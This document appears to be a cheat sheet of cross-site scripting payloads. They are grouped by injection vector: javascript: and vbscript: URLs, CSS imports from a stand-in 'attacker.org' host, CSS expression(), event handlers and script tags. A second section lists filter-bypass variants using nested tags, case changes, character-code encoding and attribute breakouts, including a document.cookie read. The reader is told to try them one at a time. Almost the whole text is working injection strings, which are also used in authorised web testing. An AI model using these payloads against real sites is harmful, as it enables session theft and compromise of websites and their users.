1.5 XSS Payload
Type 1: JavaScript URL
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
Type 2: CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
Type 3: Inline style
<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div>
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
Type 4: JavaScript events
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src=1 onerror=alert(1)>
<img/src='1'/onerror=alert(0)>
Type 5: Script tags
<script src="http://baidu.com"></script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
Try them one at a time and reason about the result.
DOM-based, stored, reflected; case-variation bypass, blacklist bypass, encoding bypass, onclick event bypass
Keywords: closing characters, alert, script, <>, ', ", (), URL encoding, ASCII/decimal conversion
<script>alert(1)</script>
alert(/xss/)
";alert(/xss/)//
"><script>alert('xss')</script><"
<script>alert(document.cookie)</script>
<Script>alert("ANY")</Script>
"> <Script>alert('handsome boy')</script> //
<scr<script>ipt>alert("ANY")</scr</script>ipt>
<img src=1 onerror=alert("ANY")>
"> <scscriptript>alert`xss`</scscriptript> //
oninput=alert`1`
<a href="x" onclick="alert(/xss/)">test</a>
"<script>alert('xss')</script>"
" onchange='alert(1)' "
<script>AlerT("ANY")</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 65, 78, 89, 34, 41))</script>
"> <a href="javascript:%61lert(1)">click me</a> //